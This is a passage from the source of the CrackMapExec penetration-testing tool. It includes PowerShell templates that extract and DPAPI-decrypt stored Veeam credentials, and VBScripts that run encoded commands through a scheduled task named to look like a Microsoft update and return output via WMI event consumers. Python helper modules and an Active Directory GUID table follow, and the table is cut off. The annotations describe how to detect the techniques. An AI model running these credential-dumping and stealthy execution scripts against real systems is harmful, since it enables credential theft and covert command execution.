Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
return
}
# Domain and user name come from the plain configuration, the password from the decrypted XML.
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
# The clear-text password is written to the host output.
Write-Host "Domain: $($domain.Domain)"
Write-Host "Username: $($username.Username)"
Write-Host "Password: $($password.Password)"
================================================
FILE: cme/data/veeam_dump_module/veeam_dump_mssql.ps1
================================================
# Template script: the REPLACE_ME_* values are placeholders substituted before the script runs.
# Effect: reads user_name/password rows from the [Credentials] table of the Veeam database over
# an integrated-security OLE DB connection, decrypts each password with DPAPI in LocalMachine
# scope and prints the result as a table.
# Detection: a query against the Credentials table from a process other than the Veeam
# services, and ProtectedData.Unprotect calls in PowerShell script-block logs on the server.
$SqlDatabaseName = "REPLACE_ME_SqlDatabase"
$SqlServerName = "REPLACE_ME_SqlServer"
$SqlInstanceName = "REPLACE_ME_SqlInstance"
#Forming the connection string
# NOTE(review): the database name is interpolated into the SQL text; it comes from the
# placeholder above, not from the database.
$SQL = "SELECT [user_name] AS 'User',[password] AS 'Password' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" #Filter empty passwords
$auth = "Integrated Security=SSPI;" #Local user
$connectionString = "Provider=sqloledb; Data Source=$SqlServerName\$SqlInstanceName; Initial Catalog=$SqlDatabaseName; $auth;"
$connection = New-Object System.Data.OleDb.OleDbConnection $connectionString
$command = New-Object System.Data.OleDb.OleDbCommand $SQL, $connection
#Fetching encrypted credentials from the database
try {
$connection.Open()
$adapter = New-Object System.Data.OleDb.OleDbDataAdapter $command
$dataset = New-Object System.Data.DataSet
[void] $adapter.Fill($dataSet)
$connection.Close()
}
catch {
Write-Host "Can't connect to DB! Exiting..."
exit -1
}
$rows=($dataset.Tables | Select-Object -Expand Rows)
if ($rows.count -eq 0) {
Write-Host "No passwords found!"
exit
}
Add-Type -assembly System.Security
#Decrypting passwords using DPAPI
# LocalMachine scope: any process on this host can unprotect these blobs.
$rows | ForEach-Object -Process {
$EnryptedPWD = [Convert]::FromBase64String($_.password)
$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
$enc = [system.text.encoding]::Default
# Whitespace inside a password is replaced by a marker string so the table output stays parseable.
$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
}
Write-Output $rows | Format-Table -HideTableHeaders | Out-String
================================================
FILE: cme/data/veeam_dump_module/veeam_dump_postgresql.ps1
================================================
# Template script: the REPLACE_ME_* values are placeholders substituted before the script runs.
# Effect: runs the executable at $PostgreSqlExec to read user_name/password rows from the
# credentials table, decrypts each password with DPAPI in LocalMachine scope and prints the
# result as a table.
# Detection: that executable being started by PowerShell with a query on the credentials table,
# and ProtectedData.Unprotect calls in PowerShell script-block logs on the server.
$PostgreSqlExec = "REPLACE_ME_PostgreSqlExec"
$PostgresUserForWindowsAuth = "REPLACE_ME_PostgresUserForWindowsAuth"
$SqlDatabaseName = "REPLACE_ME_SqlDatabaseName"
$SQLStatement = "SELECT user_name AS User,password AS Password FROM credentials WHERE password != '';"
# -w never prompts for a password; presumably authentication relies on the Windows identity
# named above (confirm against the server's authentication configuration).
$output = . $PostgreSqlExec -U $PostgresUserForWindowsAuth -w -d $SqlDatabaseName -c $SQLStatement --csv | ConvertFrom-Csv
if ($output.count -eq 0) {
Write-Host "No passwords found!"
exit
}
Add-Type -assembly System.Security
#Decrypting passwords using DPAPI
# LocalMachine scope: any process on this host can unprotect these blobs.
$output | ForEach-Object -Process {
$EnryptedPWD = [Convert]::FromBase64String($_.password)
$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
$enc = [system.text.encoding]::Default
# Whitespace inside a password is replaced by a marker string so the table output stays parseable.
$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
}
Write-Output $output | Format-Table -HideTableHeaders | Out-String
================================================
FILE: cme/data/wmiexec_event_vbscripts/Exec_Command_Silent.vbs
================================================
' Template script: the REPLACE_ME_* values are placeholders substituted before the script runs.
' Effect: decodes a base64 command, registers a scheduled task that runs it through cmd.exe,
' then deletes the task definition straight away. No output is collected.
' Detection: a task with Author "Microsoft" and Description "Update" whose action is
' c:\windows\system32\cmd.exe /Q /c ..., registered and deleted within the same second.
Dim command
command = Base64StringDecode("REPLACE_ME_BASE64_COMMAND")
' NOTE(review): TriggerTypeDaily is declared but not used below.
Const TriggerTypeDaily = 1
Const ActionTypeExec = 0
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Update"
regInfo.Author = "Microsoft"
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False
settings.DisallowStartIfOnBatteries = False
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
' Trigger type 7; presumably the registration trigger, so the task fires once it is registered.
Set trigger = triggers.Create(7)
Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "c:\windows\system32\cmd.exe"
Action.arguments = "/Q /c " & command
Dim objNet, LoginUser
Set objNet = CreateObject("WScript.Network")
LoginUser = objNet.UserName
' The account name is passed on only when the script runs as SYSTEM; otherwise it is left empty.
If UCase(LoginUser) = "SYSTEM" Then
Else
LoginUser = Empty
End If
Call rootFolder.RegisterTaskDefinition("REPLACE_ME_TEMP_TASKNAME", taskDefinition, 6, LoginUser, , 3)
Call rootFolder.DeleteTask("REPLACE_ME_TEMP_TASKNAME",0)
' Decode the base64 string vCode and return it as text.
' The bytes are produced by an MSXML node of type bin.base64, written into an ADODB.Stream in
' binary mode, and read back from position 0 in text mode with the utf-8 charset.
Function Base64StringDecode(ByVal vCode)
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Set BinaryStream = CreateObject("ADODB.Stream")
' Type 1 = binary while the decoded bytes are written.
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.Position = 0
' Type 2 = text for the read that follows.
BinaryStream.Type = 2
' All Format => utf-16le - utf-8 - utf-16le
BinaryStream.CharSet = "utf-8"
Base64StringDecode = BinaryStream.ReadText
Set BinaryStream = Nothing
Set oNode = Nothing
End Function
================================================
FILE: cme/data/wmiexec_event_vbscripts/Exec_Command_WithOutput.vbs
================================================
' Template script: the REPLACE_ME_* values are placeholders substituted before the script runs.
' The script behaves as a three-state machine keyed on an ActiveScriptEventConsumer instance
' named REPLACE_ME_INSTANCEID in root\subscription and on the output file:
'   1. instance missing, output file missing: run the command through a scheduled task,
'      with stdout and stderr redirected to the output file;
'   2. instance missing, output file present: base64-encode the file and store it in the
'      ScriptText property of a new consumer instance;
'   3. instance present: delete the output file.
' Detection: ActiveScriptEventConsumer instances in root\subscription whose ScriptText is a
' base64 blob, short-lived files under C:\Windows\Temp written by cmd.exe, and a task with
' Author "Microsoft" and Description "Update" that is registered and deleted at once.
Dim command, outputPath
command = Base64StringDecode("REPLACE_ME_BASE64_COMMAND")
outputPath = "C:\Windows\Temp\REPLACE_ME_OUTPUT_FILE"
' Errors are checked by hand through Err.Number from here on.
On Error Resume Next
Set objTestNewInst = GetObject("Winmgmts:root\subscription:ActiveScriptEventConsumer.Name=""REPLACE_ME_INSTANCEID""")
' A non-zero Err.Number here means the consumer instance could not be fetched.
If Err.Number <> 0 Then
Err.Clear
If FileExists(outputPath) Then
inputFile = outputPath
Set inStream = CreateObject("ADODB.Stream")
inStream.Open
inStream.type= 1 'TypeBinary
inStream.LoadFromFile(inputFile)
readBytes = inStream.Read()
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.nodeTypedValue = readBytes
Base64Encode = oNode.text
' Write back into wmi class
' NOTE(review): wbemCimtypeString is assigned but not used below.
wbemCimtypeString = 8
Set objClass = GetObject("Winmgmts:root\subscription:ActiveScriptEventConsumer")
Set objInstance = objClass.spawninstance_
objInstance.name="REPLACE_ME_INSTANCEID"
objInstance.scriptingengine="vbscript"
objInstance.scripttext = Base64Encode
objInstance.put_
Else
' NOTE(review): TriggerTypeDaily is declared but not used below.
Const TriggerTypeDaily = 1
Const ActionTypeExec = 0
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Update"
regInfo.Author = "Microsoft"
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False
settings.DisallowStartIfOnBatteries = False
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
' Trigger type 7; presumably the registration trigger, so the task fires once it is registered.
Set trigger = triggers.Create(7)
Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "c:\windows\system32\cmd.exe"
Action.arguments = "/Q /c " & command & " 1> " & outputPath & " 2>&1"
Dim objNet, LoginUser
Set objNet = CreateObject("WScript.Network")
LoginUser = objNet.UserName
' The account name is passed on only when the script runs as SYSTEM; otherwise it is left empty.
If UCase(LoginUser) = "SYSTEM" Then
Else
LoginUser = Empty
End If
Call rootFolder.RegisterTaskDefinition("REPLACE_ME_TEMP_TASKNAME", taskDefinition, 6, LoginUser, , 3)
Call rootFolder.DeleteTask("REPLACE_ME_TEMP_TASKNAME",0)
End If
Else
' The consumer instance exists, so only the output file is removed; a failed delete is ignored.
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(outputPath)
If Err.Number <> 0 Then
Err.Clear
End If
End If
' Return True when FilePath names an existing file, False otherwise.
' The check is delegated to Scripting.FileSystemObject.FileExists.
Function FileExists(FilePath)
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists(FilePath) Then
FileExists=CBool(1)
Else
FileExists=CBool(0)
End If
End Function
' Decode the base64 string vCode and return it as text.
' The bytes are produced by an MSXML node of type bin.base64, written into an ADODB.Stream in
' binary mode, and read back from position 0 in text mode with the utf-8 charset.
Function Base64StringDecode(ByVal vCode)
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Set BinaryStream = CreateObject("ADODB.Stream")
' Type 1 = binary while the decoded bytes are written.
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.Position = 0
' Type 2 = text for the read that follows.
BinaryStream.Type = 2
' All Format => utf-16le - utf-8 - utf-16le
BinaryStream.CharSet = "utf-8"
Base64StringDecode = BinaryStream.ReadText
Set BinaryStream = Nothing
Set oNode = Nothing
End Function
================================================
FILE: cme/first_run.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from os import mkdir
from os.path import exists
from os.path import join as path_join
import shutil
from cme.paths import CME_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
from cme.cmedb import initialize_db
from cme.logger import cme_logger
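def first_run_setup(logger=cme_logger):
    """Create the per-user CME directory tree, databases and configuration file.

    Safe to call on every start: each directory and the configuration file are
    only created when they do not exist yet.

    Args:
        logger: Object providing ``display``; also handed to ``initialize_db``.
    """
    # Owner-only permissions. The tree holds the workspace databases, the logs
    # and the configuration file, all of which can contain credentials. The mode
    # applies to directories created here; existing installations are untouched.
    private_mode = 0o700

    if not exists(TMP_PATH):
        mkdir(TMP_PATH)

    if not exists(CME_PATH):
        logger.display("First time use detected")
        logger.display("Creating home directory structure")
        mkdir(CME_PATH, private_mode)

    folders = (
        "logs",
        "modules",
        "protocols",
        "workspaces",
        "obfuscated_scripts",
        "screenshots",
    )
    for folder in folders:
        folder_path = path_join(CME_PATH, folder)
        if not exists(folder_path):
            logger.display(f"Creating missing folder {folder}")
            mkdir(folder_path, private_mode)

    initialize_db(logger)

    if not exists(CONFIG_PATH):
        logger.display("Copying default configuration file")
        default_path = path_join(DATA_PATH, "cme.conf")
        # shutil.copy keeps the permission bits of the packaged file; the copy is
        # protected by the owner-only directory it lands in.
        shutil.copy(default_path, CME_PATH)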
# if not exists(CERT_PATH):
# logger.display('Generating SSL certificate')
# try:
# check_output(['openssl', 'help'], stderr=PIPE)
# if os.name != 'nt':
# os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US" > /dev/null 2>&1'.format(path=CERT_PATH))
# else:
# os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US"'.format(path=CERT_PATH))
# except OSError as e:
# if e.errno == errno.ENOENT:
# logger.error('OpenSSL command line utility is not installed, could not generate certificate, using default certificate')
# default_path = path_join(DATA_PATH, 'default.pem')
# shutil.copy(default_path, CERT_PATH)
# else:
# logger.error('Error while generating SSL certificate: {}'.format(e))
# sys.exit(1)
================================================
FILE: cme/helpers/__init__.py
================================================
================================================
FILE: cme/helpers/bash.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from cme.paths import DATA_PATH
def get_script(path):
    """Return the text of a bundled script.

    ``path`` is joined onto ``DATA_PATH`` as given, without normalisation, so
    it is expected to be a fixed relative name chosen by the calling code.
    """
    script_path = os.path.join(DATA_PATH, path)
    with open(script_path, "r") as handle:
        contents = handle.read()
    return contents
================================================
FILE: cme/helpers/bloodhound.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
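def add_user_bh(user, domain, logger, config):
    """Mark one or more accounts as owned in the BloodHound Neo4j database.

    Args:
        user: A single account name (str) or a list of
            ``{"username": ..., "domain": ...}`` dicts.
        domain: Domain of ``user``; only read when ``user`` is a str.
        logger: Object providing ``debug``, ``highlight`` and ``fail``.
        config: Object with a configparser-style ``get(section, option)``.

    Returns:
        None. Nothing is done when ``[BloodHound] bh_enabled`` is the string
        "False". Neo4j errors are reported through ``logger.fail``.
    """
    if isinstance(user, str):
        users_owned = [{"username": user.upper(), "domain": domain.upper()}]
    else:
        users_owned = user

    if config.get("BloodHound", "bh_enabled") == "False":
        return

    # Older driver releases expose the API under neo4j.v1.
    try:
        from neo4j.v1 import GraphDatabase
    except ImportError:
        from neo4j import GraphDatabase
    from neo4j.exceptions import AuthError, ServiceUnavailable

    bh_user = config.get("BloodHound", "bh_user")
    uri = f"bolt://{config.get('BloodHound', 'bh_uri')}:{config.get('BloodHound', 'bh_port')}"
    # NOTE(review): encrypted=False means the bolt session, including the login,
    # is sent in clear text whenever bh_uri is not a loopback address.
    driver = GraphDatabase.driver(
        uri,
        auth=(bh_user, config.get("BloodHound", "bh_pass")),
        encrypted=False,
    )
    try:
        with driver.session() as session, session.begin_transaction() as tx:
            for info in users_owned:
                if info["username"][-1] == "$":
                    # Machine accounts end in "$" and are stored as HOST.DOMAIN.
                    user_owned = info["username"][:-1] + "." + info["domain"]
                    account_type = "Computer"
                else:
                    user_owned = info["username"] + "@" + info["domain"]
                    account_type = "User"

                # Account names come from the assessed environment, so the name
                # is passed as a query parameter instead of being spliced into
                # the Cypher text. The label cannot be a parameter, but it is
                # one of the two literals chosen above.
                match_clause = f"MATCH (c:{account_type} {{name: $name}})"
                params = {"name": user_owned}

                result = tx.run(f"{match_clause} RETURN c", params)
                # An unknown node yields no rows; the IndexError raised here is
                # reported by the generic handler below.
                if result.data()[0]["c"].get("owned") in (False, None):
                    set_owned = f"{match_clause} SET c.owned=True RETURN c.name AS name"
                    logger.debug(f"{set_owned} (name={user_owned!r})")
                    tx.run(set_owned, params)
                    logger.highlight(f"Node {user_owned} successfully set as owned in BloodHound")
    except AuthError:
        # The password is deliberately left out of the message so it does not
        # end up in log files.
        logger.fail(f"Provided Neo4J credentials for user {bh_user} are not valid.")
    except ServiceUnavailable:
        logger.fail(f"Neo4J does not seem to be available on {uri}.")
    except Exception:
        logger.fail("Unexpected error with Neo4J")
        logger.fail("Account not found on the domain")
    finally:
        # Release the connection pool on every path, including the error ones.
        driver.close()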
================================================
FILE: cme/helpers/http.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
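def get_desktop_uagent(uagent=None):
    """Return a desktop browser User-Agent string.

    Args:
        uagent: Key of the wanted entry (for example ``"Chrome32"``). When it
            is falsy, a random entry is returned.

    Returns:
        The User-Agent string.

    Raises:
        KeyError: ``uagent`` is not one of the known keys.
    """
    desktop_uagents = {
        "MSIE9.0": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
        "MSIE8.0": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)",
        "MSIE7.0": "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
        "MSIE6.0": "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
        "Chrome32": "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
        "Chrome31": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36",
        "Firefox25": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0",
        # The stray trailing comma that used to end this value has been removed.
        "Firefox24": "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",
        "Safari5.1": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
        "Safari5.0": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16",
    }
    if not uagent:
        # dict views are not sequences in Python 3, so random.choice needs a list.
        return random.choice(list(desktop_uagents.values()))
    return desktop_uagents[uagent]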
================================================
FILE: cme/helpers/logger.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from termcolor import colored
def write_log(data, log_name):
    """Write ``data`` to ``~/.cme/logs/<log_name>``, replacing any existing file.

    ``log_name`` is joined onto the logs directory as given, so it is expected
    to be a plain file name chosen by the calling code.
    """
    target = os.path.join(os.path.expanduser("~/.cme"), "logs", log_name)
    with open(target, "w") as log_output:
        log_output.write(data)
def highlight(text, color="yellow"):
    """Return ``text`` in bold yellow or bold red.

    Any other ``color`` value falls through and the function returns None.
    """
    if color not in ("yellow", "red"):
        return None
    return f"{colored(text, color, attrs=['bold'])}"
================================================
FILE: cme/helpers/misc.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
import string
import re
import inspect
import os
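def identify_target_file(target_file):
    """Guess the scanner format of a target file from its second line.

    Args:
        target_file: Path of the file to inspect.

    Returns:
        "nessus" when the second line starts with ``<NessusClientData``,
        "nmap" when it ends with ``nmaprun>``, otherwise "unknown".
    """
    with open(target_file, "r") as handle:
        # Only the second line is inspected, so stop reading right after it
        # instead of walking through the rest of a possibly large export.
        handle.readline()
        # Dropping the line ending lets a file that stops right after the
        # second line, without a final newline, still be recognised.
        second_line = handle.readline().rstrip("\r\n")

    if second_line.startswith("<NessusClientData"):
        return "nessus"
    if second_line.endswith("nmaprun>"):
        return "nmap"
    return "unknown"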
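def gen_random_string(length=10):
    """Return a random string of ASCII letters.

    Args:
        length: Number of characters; anything ``int()`` accepts.

    Letters are drawn with replacement, so lengths above the 52 available
    letters work as well. The ``random`` module is not a cryptographic source:
    use this for throwaway names, not for secrets or tokens.
    """
    return "".join(random.choices(string.ascii_letters, k=int(length)))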
def validate_ntlm(data):
    """Return True when ``data`` starts with 32 hexadecimal characters.

    The pattern is anchored at the start only, so any text after the first 32
    characters is accepted as well. Matching is case-insensitive.
    """
    hex_prefix = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
    return hex_prefix.match(data) is not None
def called_from_cmd_args():
    """Return True when a known entry-point function is on the call stack.

    The stack is searched for a frame whose function name is one of
    ``print_host_info``, ``plaintext_login``, ``hash_login``,
    ``kerberos_login`` or ``call_cmd_args``.
    """
    entry_points = (
        "print_host_info",
        "plaintext_login",
        "hash_login",
        "kerberos_login",
        "call_cmd_args",
    )
    # Index 3 of each stack record is the name of the function for that frame.
    return any(record[3] in entry_points for record in inspect.stack())
# Stolen from https://github.com/pydanny/whichcraft/
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
    """Locate ``cmd`` on a search path and return its full path, or None.

    ``mode`` is the access mask a candidate has to satisfy and defaults to
    os.F_OK | os.X_OK. ``path`` is a search path string; when it is None the
    PATH environment variable is used, falling back to os.defpath.

    Note: This function was backported from the Python 3 source code.
    """

    def _usable(candidate):
        # Directories pass the os.access check on Windows, so they are
        # excluded explicitly.
        return os.path.exists(candidate) and os.access(candidate, mode) and not os.path.isdir(candidate)

    # A command that carries a directory part is checked as given (this covers
    # names relative to the current directory such as ./script) and the search
    # path is not consulted at all.
    if os.path.dirname(cmd):
        return cmd if _usable(cmd) else None

    search_path = os.environ.get("PATH", os.defpath) if path is None else path
    if not search_path:
        return None

    visited = set()
    for directory in search_path.split(os.pathsep):
        key = os.path.normcase(directory)
        if key in visited:
            # Each directory is probed once, however often it is listed.
            continue
        visited.add(key)
        candidate = os.path.join(directory, cmd)
        if _usable(candidate):
            return candidate
    return None
================================================
FILE: cme/helpers/msada_guids.py
================================================
"""
Impacket - Collection of Python classes for working with network protocols.
SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
This software is provided under a slightly modified version
of the Apache Software License. See the accompanying LICENSE file
for more information.
Authors:
Charlie BROMBERG (@_nwodtuhs)
Guillaume DAUMAS (@BlWasp_)
Lucien DOUSTALY (@Wlayzz)
References:
MS-ADA1, MS-ADA2, MS-ADA3 Active Directory Schema Attributes and their GUID:
- [MS-ADA1] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/19528560-f41e-4623-a406-dabcfff0660f
- [MS-ADA2] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/e20ebc4e-5285-40ba-b3bd-ffcb81c2783e
- [MS-ADA3] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada3/4517e835-3ee6-44d4-bb95-a94b6966bfb0
GUIDs gathered from the source below (it was heavily cleaned up, so entries may be missing):
- https://www.powershellgallery.com/packages/SDDLParser/0.5.0/Content/SDDLParserADObjects.ps1
This library is not yet present in the Impacket version used by CrackMapExec, so it was added manually under helpers.
"""
SCHEMA_OBJECTS = {
"2a132580-9373-11d1-aebc-0000f80367c1": "FRS-Partner-Auth-Level",
"2a8c68fc-3a7a-4e87-8720-fe77c51cbe74": "ms-DS-Non-Members-BL",
"963d2751-48be-11d1-a9c3-0000f80367c1": "Mscope-Id",
"bf967a0c-0de6-11d0-a285-00aa003049e2": "Range-Lower",
"29259694-09e4-4237-9f72-9306ebe63ab2": "ms-TS-Primary-Desktop",
"963d2756-48be-11d1-a9c3-0000f80367c1": "DHCP-Class",
"1562a632-44b9-4a7e-a2d3-e426c96a3acc": "ms-PKI-Private-Key-Recovery-Agent",
"2a132581-9373-11d1-aebc-0000f80367c1": "FRS-Primary-Member",
"4b1cba4e-302f-4134-ac7c-f01f6c797843": "ms-DS-Phonetic-First-Name",
"7bfdcb7d-4807-11d1-a9c3-0000f80367c1": "Msi-File-List",
"bf967a0d-0de6-11d0-a285-00aa003049e2": "Range-Upper",
"f63aa29a-bb31-48e1-bfab-0a6c5a1d39c2": "ms-TS-Secondary-Desktops",
"5245801a-ca6a-11d0-afff-0000f80367c1": "FRS-Replica-Set-GUID",
"f217e4ec-0836-4b90-88af-2f5d4bbda2bc": "ms-DS-Phonetic-Last-Name",
"d9e18313-8939-11d1-aebc-0000f80367c1": "Msi-Script",
"bf967a0e-0de6-11d0-a285-00aa003049e2": "RDN",
"9daadc18-40d1-4ed1-a2bf-6b9bf47d3daa": "ms-TS-Primary-Desktop-BL",
"e0fa1e8a-9b45-11d0-afdd-00c04fd930c9": "Display-Specifier",
"bf967aa8-0de6-11d0-a285-00aa003049e2": "Print-Queue",
"bf967a8f-0de6-11d0-a285-00aa003049e2": "DMD",
"26d9736b-6070-11d1-a9c6-0000f80367c1": "FRS-Replica-Set-Type",
"6cd53daf-003e-49e7-a702-6fa896e7a6ef": "ms-DS-Phonetic-Department",
"96a7dd62-9118-11d1-aebc-0000f80367c1": "Msi-Script-Name",
"bf967a0f-0de6-11d0-a285-00aa003049e2": "RDN-Att-ID",
"34b107af-a00a-455a-b139-dd1a1b12d8af": "ms-TS-Secondary-Desktop-BL",
"1be8f174-a9ff-11d0-afe2-00c04fd930c9": "FRS-Root-Path",
"5bd5208d-e5f4-46ae-a514-543bc9c47659": "ms-DS-Phonetic-Company-Name",
"bf967937-0de6-11d0-a285-00aa003049e2": "Msi-Script-Path",
"bf967a10-0de6-11d0-a285-00aa003049e2": "Registered-Address",
"faaea977-9655-49d7-853d-f27bb7aaca0f": "MS-TS-Property01",
"5fd4250c-1262-11d0-a060-00aa006c33ed": "Display-Template",
"83cc7075-cca7-11d0-afff-0000f80367c1": "Query-Policy",
"5a8b3261-c38d-11d1-bbc9-0080c76670c0": "SubSchema",
"5245801f-ca6a-11d0-afff-0000f80367c1": "FRS-Root-Security",
"e21a94e4-2d66-4ce5-b30d-0ef87a776ff0": "ms-DS-Phonetic-Display-Name",
"96a7dd63-9118-11d1-aebc-0000f80367c1": "Msi-Script-Size",
"bf967a12-0de6-11d0-a285-00aa003049e2": "Remote-Server-Name",
"3586f6ac-51b7-4978-ab42-f936463198e7": "MS-TS-Property02",
"bf967915-0de6-11d0-a285-00aa003049e2": "Account-Expires",
"ddac0cee-af8f-11d0-afeb-00c04fd930c9": "FRS-Service-Command",
"def449f1-fd3b-4045-98cf-d9658da788b5": "ms-DS-HAB-Seniority-Index",
"9a0dc326-c100-11d1-bbc5-0080c76670c0": "MSMQ-Authenticate",
"bf967a14-0de6-11d0-a285-00aa003049e2": "Remote-Source",
"70004ef5-25c3-446a-97c8-996ae8566776": "MS-TS-ExpireDate",
"bf967aa9-0de6-11d0-a285-00aa003049e2": "Remote-Mail-Recipient",
"bf967a80-0de6-11d0-a285-00aa003049e2": "Attribute-Schema",
"2a132582-9373-11d1-aebc-0000f80367c1": "FRS-Service-Command-Status",
"c881b4e2-43c0-4ebe-b9bb-5250aa9b434c": "ms-DS-Promotion-Settings",
"9a0dc323-c100-11d1-bbc5-0080c76670c0": "MSMQ-Base-Priority",
"bf967a15-0de6-11d0-a285-00aa003049e2": "Remote-Source-Type",
"54dfcf71-bc3f-4f0b-9d5a-4b2476bb8925": "MS-TS-ExpireDate2",
"e0fa1e8b-9b45-11d0-afdd-00c04fd930c9": "Dns-Zone",
"031952ec-3b72-11d2-90cc-00c04fd91ab1": "Account-Name-History",
"1be8f175-a9ff-11d0-afe2-00c04fd930c9": "FRS-Staging-Path",
"98a7f36d-3595-448a-9e6f-6b8965baed9c": "ms-DS-SiteName",
"9a0dc32e-c100-11d1-bbc5-0080c76670c0": "MSMQ-Computer-Type",
"2a39c5b0-8960-11d1-aebc-0000f80367c1": "Remote-Storage-GUID",
"41bc7f04-be72-4930-bd10-1f3439412387": "MS-TS-ExpireDate3",
"2a39c5bd-8960-11d1-aebc-0000f80367c1": "Remote-Storage-Service-Point",
"7f56127d-5301-11d1-a9c5-0000f80367c1": "ACS-Aggregate-Token-Rate-Per-User",
"2a132583-9373-11d1-aebc-0000f80367c1": "FRS-Time-Last-Command",
"20119867-1d04-4ab7-9371-cfc3d5df0afd": "ms-DS-Supported-Encryption-Types",
"18120de8-f4c4-4341-bd95-32eb5bcf7c80": "MSMQ-Computer-Type-Ex",
"281416c0-1968-11d0-a28f-00aa003049e2": "Repl-Property-Meta-Data",
"5e11dc43-204a-4faf-a008-6863621c6f5f": "MS-TS-ExpireDate4",
"39bad96d-c2d6-4baf-88ab-7e4207600117": "document",
"7f561283-5301-11d1-a9c5-0000f80367c1": "ACS-Allocable-RSVP-Bandwidth",
"2a132584-9373-11d1-aebc-0000f80367c1": "FRS-Time-Last-Config-Change",
"29cc866e-49d3-4969-942e-1dbc0925d183": "ms-DS-Trust-Forest-Trust-Info",
"9a0dc33a-c100-11d1-bbc5-0080c76670c0": "MSMQ-Cost",
"7bfdcb83-4807-11d1-a9c3-0000f80367c1": "Repl-Topology-Stay-Of-Execution",
"0ae94a89-372f-4df2-ae8a-c64a2bc47278": "MS-TS-LicenseVersion",
"a8df74d6-c5ea-11d1-bbcb-0080c76670c0": "Residential-Person",
"1cb355a1-56d0-11d1-a9c6-0000f80367c1": "ACS-Cache-Timeout",
"1be8f172-a9ff-11d0-afe2-00c04fd930c9": "FRS-Update-Timeout",
"461744d7-f3b6-45ba-8753-fb9552a5df32": "ms-DS-Tombstone-Quota-Factor",
"9a0dc334-c100-11d1-bbc5-0080c76670c0": "MSMQ-CSP-Name",
"bf967a16-0de6-11d0-a285-00aa003049e2": "Repl-UpToDate-Vector",
"4b0df103-8d97-45d9-ad69-85c3080ba4e7": "MS-TS-LicenseVersion2",
